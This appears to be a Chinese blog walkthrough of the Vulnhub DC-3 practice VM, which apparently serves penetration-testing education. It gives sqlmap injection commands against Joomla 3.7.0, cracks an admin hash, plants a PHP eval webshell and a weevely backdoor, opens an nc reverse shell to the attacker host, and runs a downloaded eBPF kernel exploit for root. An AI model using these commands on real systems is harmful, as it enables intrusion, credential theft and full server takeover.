Vulnhub靶机实战—

靶机DC-3下载地址：https : //download.vulnhub.com/dc/DC-3.zip

靶机DC-3VMware下载地址：https : //download.vulnhub.com/dc/DC-3VMware.zip

注：开始将DC-3.ova文件导入VMware虚拟机，发现无法获取到靶机IP地址，作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware，然后导入到VMware中就可以了

描述：从靶机DC-3开始，只有一个最终的flag，只有拿到root权限才可以发现最终的flag

环境：Vmware 15 Pro虚拟机软件

DC-3靶机IP地址：192.168.220.136

Kali的IP地址：192.168.220.131

将靶机DC-3与Kali都以NAT模式连接到网络，查看Kali的IP地址：192.168.220.131

ip addr

使用nmap扫描工具192.168.220.0/24网段，查找存活主机，扫描到DC-3靶机的IP地址为：192.168.220.136

nmap -T4 -sP 192.168.220.0/24 -oN nmap220.sP

对靶机扫描开放的端口，端口范围0-65535，扫描到开放端口为80（http）

nmap -T4 -A 192.168.220.136 -p- -oN nmap136.A

浏览器输入靶机IP地址访问网址http://192.168.220.136

使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等

whatweb扫描靶机后发现靶机使用Joomla内容管理系统

whatweb http://192.168.220.136

使用joomscan扫描工具扫描Joomla相关配置内容、坚持已知漏洞等等

扫描后得知Joomla版本3.7.0，管理员登录页面，及一些可以访问的网站目录

joomscan --url http://192.168.220.136

使用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞，发现一个sql注入漏洞

searchsploit Joomla 3.7.0

将sql注入漏洞相关介绍文档保存到本地，并查看相关注入方法

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt  jommla-370-sqli.txt
cat Joomla-370-sqli.txt

使用sqlmap自动注入工具对靶机执行sql注入代码

注入查询数据库有哪些，查出5个数据库信息

sqlmap -u "http://192.168.220.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

注入查询当前靶机正在使用的数据库为：joomladb

sqlmap -u "http://192.168.220.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

注入查询joomladb数据库有哪些表，筛选出用户表：#__users

sqlmap -u "http://192.168.220.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables  -p list[fullordering]

注入查询#__users表有哪些列，共6列

sqlmap -u "http://192.168.220.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]

Sql注入查询#__users表的name、password字段，输出信息

sqlmap  -u "http://192.168.220.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump  -p list[fullordering]

获得网站后台登录用户名admin和密码hash值：

admin  #用户名
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu  #密码hash值

将密文保存到文件Joomla370-136-admin-hash中：

vim Joomla370-136-admin-hash
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

使用john爆破hash值，得到密码：snoopy

john jommla-370-sqli-admin-hash  #爆破密码
snoopy  #密码

进入后台登录页面，登录：http://192.168.220.136/administrator/

进入以下页面，或直接访问当前文件夹，均可以获取当前文件夹的内容

http://192.168.220.136/templates/beez3/html/

编写一句话脚本，获取shell

http://192.168.220.136/templates/beez3/html/shell.php  #shell地址
shell.php   #shell文件名
<?php  @eval($_POST[‘yjh’]); ?>  #一句话脚本
Yes  #输出文本内容

使用中国蚁剑连接，可以获取终端，因为蚁剑是非持续连接，所以需要反弹shell提权

可以使用weevely 生成可以获取shell的php脚本，上传到靶机

weevely  generate   123456   shell.php
#  密码：123456
#  脚本文件名：shell.php

上传shell.php后可以获得shell

weevely http://192.168.220.136/templates/beez3/html/yjh.php 123456

编写反弹shell的PHP代码，，监听1337端口，并执行脚本文件，将反弹靶机shell到kali

nc -lvp  1337  #kali开启1337监听端口<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.220.131 1337 >/tmp/f');?>
# 反弹shell到1337端口

反弹shell成功

使用searchsploit工具查找Ubuntu 16.04的提权漏洞，发现一个“拒绝服务漏洞”，可以用来提权

searchsploit ubuntu 16.04

查看漏洞介绍

cp /usr/share/exploitdb/exploits/linux/local/39772.txt  ubuntu-1604-shell.txt
cat ubuntu-1604-shell.txt

下载exp，将里面的exploit.tar上传，并解压运行

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

unzip 39772.zip  #解压29772.zip文件
cd 39772
tar -xvf exploit.tar  #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit

编译代码，编译时会出现warning，可以忽略

./compile.sh   #执行脚本，编译文件

执行代码，进行提权，获取root权限，找到最好的flag.txt

./doubleput  #执行提权文件

提权成功，获取到root权限，并发现the-flag.txt文件

Vulnhub靶机实战——DC-3相关推荐

全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日靶机描述:欢迎使用" IMF&qu ...
Vulnhub靶机实战——DC-8
靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...
Vulnhub靶机实战——DC-5
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kal ...
Vulnhub靶机实战——Matrix2
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Ma ...
挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等工具:kalilinux: 一个灵活的脑子 : 一双手目标:得到root权限&am ...
挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单靶机发布日期:2014年8月14日靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...
Vulnhub靶机实战——Matrix3
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192 ...
DC-5 vulnhub靶机实战
首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...
Vulnhub靶机实战-Forensics
声明好好学习,天天向上搭建 vmware打开,网络和攻击机一样,桥接模式渗透存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.152 -p 1 ...

Vulnhub靶机实战——DC-3

Vulnhub靶机实战——DC-3相关推荐

最新文章

热门文章